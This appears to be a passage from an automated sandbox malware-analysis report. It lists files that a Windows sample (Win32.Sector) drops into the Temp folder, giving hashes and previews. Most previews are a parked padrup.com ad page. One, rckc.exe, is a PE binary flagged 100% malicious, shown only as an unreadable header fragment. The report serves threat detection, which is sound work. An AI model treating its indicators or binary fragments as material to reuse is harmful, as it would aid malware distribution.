                                                                                                                                                                                                                                                                                          SHA1:8AFC7D23FFCFC7D69A15CBF6EF97DA6DD5EADFAA
                                                                                                                                                                                                                                                                                          SHA-256:E01C68EDD079A88BA8A50F5BBAFCCC417E0A13040E217DC733863FF395C24EC1
                                                                                                                                                                                                                                                                                          SHA-512:787D01C93A36842732ED259229BE1EFE16E164377BE7773F2714CF4D39CEBB038E8A3F6674130DE52B9A25B72D917AA600C3F0D42D9D69BAC713083572CB6748
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE2OS4zMTY0OjMyYjM3OGExYTcxNWIyNWU0MDBjMzFjYmIzNzU1Y2RkYzVhYTk1MTBjYTgzY2ZkNzYyY2M0ZGE0ZjYwM2VkZDA6NjcxMjNiYTk0ZDNmZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JhOTRkM2JkfHx8MTcyOTI0ODE2

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\pityxd.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.653970415083116
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpF3YPJMqUtmtE9VCEvcBX3M7ioaxyi6CV1MTf992wP:yYTUh9V5Eki1yi7Ml928
                                                                                                                                                                                                                                                                                          MD5:D14B75FD0CF22579DA520907E004AFB4
                                                                                                                                                                                                                                                                                          SHA1:091D120574576F9692B6FEBF739E51700DAB2139
                                                                                                                                                                                                                                                                                          SHA-256:90F078BF5B085D002F1DF52446099C2518BA2DC15F51959871BC77037361F844
                                                                                                                                                                                                                                                                                          SHA-512:F91EAC651ABBAC9E554EC77C58D80B829EC03BC9281B86B3A8AC871A542A36694E58E320F8687AF92097BC7F19170BC218509C8A09288EDB99FD95C592AAB269
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODA5NC42MTA5OjZjMGU1YzNjYTRjNjI2NDc5OGZiOWNjNzYzYmFmZmE2MjJkOTExNGFhNjdlNTNlMGVjM2NiMzVlNDUwNGI0NTc6NjcxMjNiNWU5NTI2YQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I1ZTk1MjFjfHx8MTcyOTI0ODA5

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\qbcecv.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.643458634868076
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpF4l9xMqUtmtE9VCt6cBxv3M7ioaxyi6CVoMTf992wP:Nl9jUh9Vcdei1yi75l928
                                                                                                                                                                                                                                                                                          MD5:2FA1AB7E90421DF81DF5AE634A581FAE
                                                                                                                                                                                                                                                                                          SHA1:D9F82B2E6DAC41A31D9EE05C595E96A6D94C0F33
                                                                                                                                                                                                                                                                                          SHA-256:11CA935FE1C108CF4EB80CD6230523E4FA965C3CB5FF1B5227147EC7311FDF85
                                                                                                                                                                                                                                                                                          SHA-512:A2DFE5F36849E231B901E7BD8BF81CFB7089993291855E233410416201B7704DC313D9CB2B215610B7F668F1CA25574D7B5E70AFD8BDF4E5B80DFCEF46EA5C94
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI5Mi44NjkxOjgxMGEwOTdkZmRiYmEyN2FkYTcwMDVlZDEyNGFlM2RhNWViNGFhOTRlYzc4NGE2MmU2NTFlNGEyMzEzZTQ0YTg6NjcxMjNjMjRkNDJlOQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MyNGQ0MmIwfHx8MTcyOTI0ODI5

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\rckc.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):66561
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.973549754761645
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:rBkAC6jDPqr3cOt+XmhLazoHl/8GPMXFWLihEOmDL:rBkoujcchWUHFYWW4
                                                                                                                                                                                                                                                                                          MD5:945D0DB4CA552A9CA9C64C40791E4E3C
                                                                                                                                                                                                                                                                                          SHA1:3BA0367461F9137B953A2574212ABAD51D8FDF72
                                                                                                                                                                                                                                                                                          SHA-256:A41439CA796D517B089D838B9DEF1DA5B88F3F2863D6EAF2FDDB0B146C4D0710
                                                                                                                                                                                                                                                                                          SHA-512:61260D6ED75BD61D4806747CACBEAE3442D3BA76E30372C8D75305806260D15E41C5A3649B8CE53D8CC4C1620432EA1B3218FD5B5A1B68D7B1BF6C139C03C1CD
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................V. ................................................................Y.n..~.....U......E..M.....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\rfnd.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6391538698566075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFFEPVMqUtmtE9VCO5cBRG3M7ioaxyi6CVQJMTf992wP:6E/Uh9VDuXBi1yi75l928
                                                                                                                                                                                                                                                                                          MD5:3D3CA7993862A73E58E8038B00D195AB
                                                                                                                                                                                                                                                                                          SHA1:8E189574D9345D3140105DC73D20DCE0412BC40C
                                                                                                                                                                                                                                                                                          SHA-256:4FE67AE299784584A3AC36964D7B1E5D51172A2886CC6D866A176FF12F1D90DA
                                                                                                                                                                                                                                                                                          SHA-512:5E66C4B155DF045BDB5DB0A7BA9DD8F969EF9EF0C1E165630A500DC25244A7A9C63C674E3483AA13C50D14F1A91EF190404ACCE249A468D619201049BF191007
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMwNC41ODM6ZWYxNzZhMWZkMGQ1NTRjOGQwMzZjMzI2Y2RmMjJlYTIzYWRlNzliYzI2MGM5YmVlNGI5MWIwNTcxZmNiYWY1YTo2NzEyM2MzMDhlNTdl';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MzMDhlNTRkfHx8MTcyOTI0ODMwNC43

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\unirvw.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.642497576953686
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFscFIMqUtmtE9VCmfecBlwC3M7ioaxyi6CVm1MTf992wP:vcFkUh9VzhXw9i1yi7mMl928
                                                                                                                                                                                                                                                                                          MD5:054EA5E1BFDB7D576EC003B9DEFE5A95
                                                                                                                                                                                                                                                                                          SHA1:2ADF21B36B4C48CBDB7B8559AA99BB33C4B87B29
                                                                                                                                                                                                                                                                                          SHA-256:1C17CAB407F540E0056D00271367BBBEEA0669B00FE06D9CF98454C8E3B9DBC2
                                                                                                                                                                                                                                                                                          SHA-512:43D2E96A590C690B7B34318F35D92E5EA2A245EAD27E211A838BCA18BE23ED8D731096C4B14CD930199ADB34778B21CA175C589B55966B1418F4F156697869F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI0Mi42ODg3OjI0MzYwNjZhZGYyY2ZkNTFjMTcxODU2MWJhMjY2YmNkMDcyNzlkNjdlZmMxNTczZTUwN2ZlOTY0N2Y3NmMyMjg6NjcxMjNiZjJhODIyYg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JmMmE4MWU4fHx8MTcyOTI0ODI0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winbsswvu.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64456067495782
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFDlMqUtmtE9VCT5cBJ3M7ioaxyi6CVG4MTf992wP:O3Uh9VlOi1yi72l928
                                                                                                                                                                                                                                                                                          MD5:66752CC118C839E4764B1A4DBA4717F1
                                                                                                                                                                                                                                                                                          SHA1:42387754BF92C4147C41E8CE1DDB0B549FB5C7EF
                                                                                                                                                                                                                                                                                          SHA-256:F861B309375A4667E6E48FCE38FE5D0AAA07C0E2AA4A50FC1BE3BF23D2900AE6
                                                                                                                                                                                                                                                                                          SHA-512:944AD9729475E28A2416C561591F46A8B656C23B455DD49E55FF1DF009216A94A28274A286A5E7D60DFFA5B9B1132E0FD0A805BD0880BCB671A3DA752F38D3A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIwNS4zMDg2OjRhN2JjNDVkNjY2YWJlZDAwZDQ1ZWU0ZmJiOTA3ZDcwODc3NmViZjI1ZDllZWNjODM3MDFlZjc5MTM5NDRhMWY6NjcxMjNiY2Q0YjU4MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JjZDRiNTM4fHx8MTcyOTI0ODIw

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winbyxwrs.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.64815817242641
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFuyEIsEMqUtmtE9VC3mcBosz3M7ioaxyi6CVH9MTf992wP:jyEIsQUh9VOz6i1yi7HUl928
                                                                                                                                                                                                                                                                                          MD5:F511F3393F15E2A40D4A0F47F01C0FA8
                                                                                                                                                                                                                                                                                          SHA1:1229442B4EB431EDD832115F208B5354DF5DB6C7
                                                                                                                                                                                                                                                                                          SHA-256:CFA5C89E6B94D8895B350E47410B9E50BF0FE1D36880CAADD624D0D5D5522117
                                                                                                                                                                                                                                                                                          SHA-512:A3374CD49F3CEF46BE0D5176958D8060FAF97D3D0CFAE8EA86BDCCE9617794B3D4D2A51995C49F5C0CF76FEEEB5D4315430643AA75AFF95B8D02583D1E1841FF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMyOC45NjQ1OmNjMDE0ZGUyODBkNzBmNmFjYmYzMDA5ODA0Y2EwNTU4M2ViODZlN2ZiOTU0OTU2OWNhMmRjZjA0MmZkZGQ1OTI6NjcxMjNjNDhlYjdhOQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2M0OGViNzc4fHx8MTcyOTI0ODMy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winchbv.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6330177426182715
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFonX5MqUtmtE9VCblcBw3M7ioaxyi6CVSkVMTf992wP:hUh9V5Bi1yi7Sksl928
                                                                                                                                                                                                                                                                                          MD5:599CF3DC1F39236311B950AE3EEAC98D
                                                                                                                                                                                                                                                                                          SHA1:5955BB9BF3FF1B385869996DCB06AA10F3A30892
                                                                                                                                                                                                                                                                                          SHA-256:6F4A3D1A387F873EA278A200105E5B213CC9E02D24F7A2A5C2CDB70976361877
                                                                                                                                                                                                                                                                                          SHA-512:AE5E8A5CB392D41F4327A16A432ABB3B1864A253A4A019F987364C348FC1BD3B5FA7EA4FBFCF74F1991473182E03118AC15FAF9E923079780E410B791561F936
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE1Ni41MzI2OmFiMWNmZTUzYmEwY2JlMGYwYWNiZjQwMmFjNTlhYWM0MTFhNzcxNThmOWRhNTI1NDc2ZDNmOGY1MDM2MmQ3ZTM6NjcxMjNiOWM4MjA2ZA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I5YzgyMDJmfHx8MTcyOTI0ODE1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winclhyg.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.640444706931715
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFR5MqUtmtE9VC87cBKB3M7ioaxyi6CV5MTf992wP:UbUh9VZg4Mi1yi7Ql928
                                                                                                                                                                                                                                                                                          MD5:746EE4D46EAC842AE8F8D94B652766A0
                                                                                                                                                                                                                                                                                          SHA1:9F2373456F3CD50FCF97855E72ECDBF788779DAF
                                                                                                                                                                                                                                                                                          SHA-256:96E5A6BD015CB014F49749C2520A456AA12D61C4B867C47D75431B2381308379
                                                                                                                                                                                                                                                                                          SHA-512:106D87CA5542BFD1CCC5090B37999C7CD1BDB169C6916F2DCFC7FCA755242573F18CDC2D77BC03D070AB9B1C1F4A2E3CB536E292888E23951D47BAEADA9A3ED4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIxOC43MjgyOmM0MGJiOWJiYTI1ZjFlNGUwZGU2NDJlMTYwN2VkZWE2NWM1OTQzNzhiYThkOWQ5ODJiNWM2NzM2OWJkZDlkMmI6NjcxMjNiZGFiMWNiMA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JkYWIxYzY5fHx8MTcyOTI0ODIx

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\wincrely.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.638380629553282
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFdp+MqUtmtE9VCv6cBF3M7ioaxyi6CVBMTf992wP:AQUh9VGqi1yi7Yl928
                                                                                                                                                                                                                                                                                          MD5:3B7C799A3EDBE71C2CAF2FF78A50CDEF
                                                                                                                                                                                                                                                                                          SHA1:20B5121274517535F5EB7FD3AC1354B4EC2BDB31
                                                                                                                                                                                                                                                                                          SHA-256:BACE828A871D8042B6D828310CD9873BDB3D4FEDC70EDFDC28DBBE3F03E7EF7F
                                                                                                                                                                                                                                                                                          SHA-512:F35065E65C55C1C5F5EDF04D7B82DE305A96E4A46A932411FAAB1657181D49DCB402A0A1EB7ACB85670F179166E6B78F22CA3519DEB8E09D4441DD1125F25F1F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEyMS4xNDI3OjliMzMzYWZlODdjNTkzMTIyMmMwMTEyZDQwMTk1MTc3OWJlOTJkYzQzNTVhYWM2OTgxODIzNGE3MThiMDc3NDI6NjcxMjNiNzkyMmQ3OQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I3OTIyZDRmfHx8MTcyOTI0ODEy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winevrmk.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.652244310829131
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFwgcDrMqUtmtE9VCM2cBV3M7ioaxyi6CV2MTf992wP:PgU5Uh9Vz5ii1yi7fl928
                                                                                                                                                                                                                                                                                          MD5:FDDD547A77480DA228C858CF78051A5E
                                                                                                                                                                                                                                                                                          SHA1:37FEDEDD9DB59BACEEE658A05D5577C5F1B3D026
                                                                                                                                                                                                                                                                                          SHA-256:FA0B7C0A5A37D6A5DE73C6B375E7BC3ACDC462CBB0168430C8AA8DB8733677E1
                                                                                                                                                                                                                                                                                          SHA-512:EFA627F7C811540AA1DA958807F4F989F6B54BF38BFECBF1F47A514155EC8D5CCB2371C815A1660EBF27501BE7FC208B5CFCDC6360756D0C9FF63D4A0F4E4ADE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEzOC4yNjIzOjY5NWJlZDM4NjYzZTI3ODk4MTlhYjdlZDEzYWViZjcxZjZmMDQ4MGJmMzhjNmQ0YmUwNGFkMmVhNTY0OWI4MDU6NjcxMjNiOGE0MDA2Yw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I4YTQwMDNkfHx8MTcyOTI0ODEz

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winfpnht.exe

                                                                                                                                                                                                                                                                                          Download File
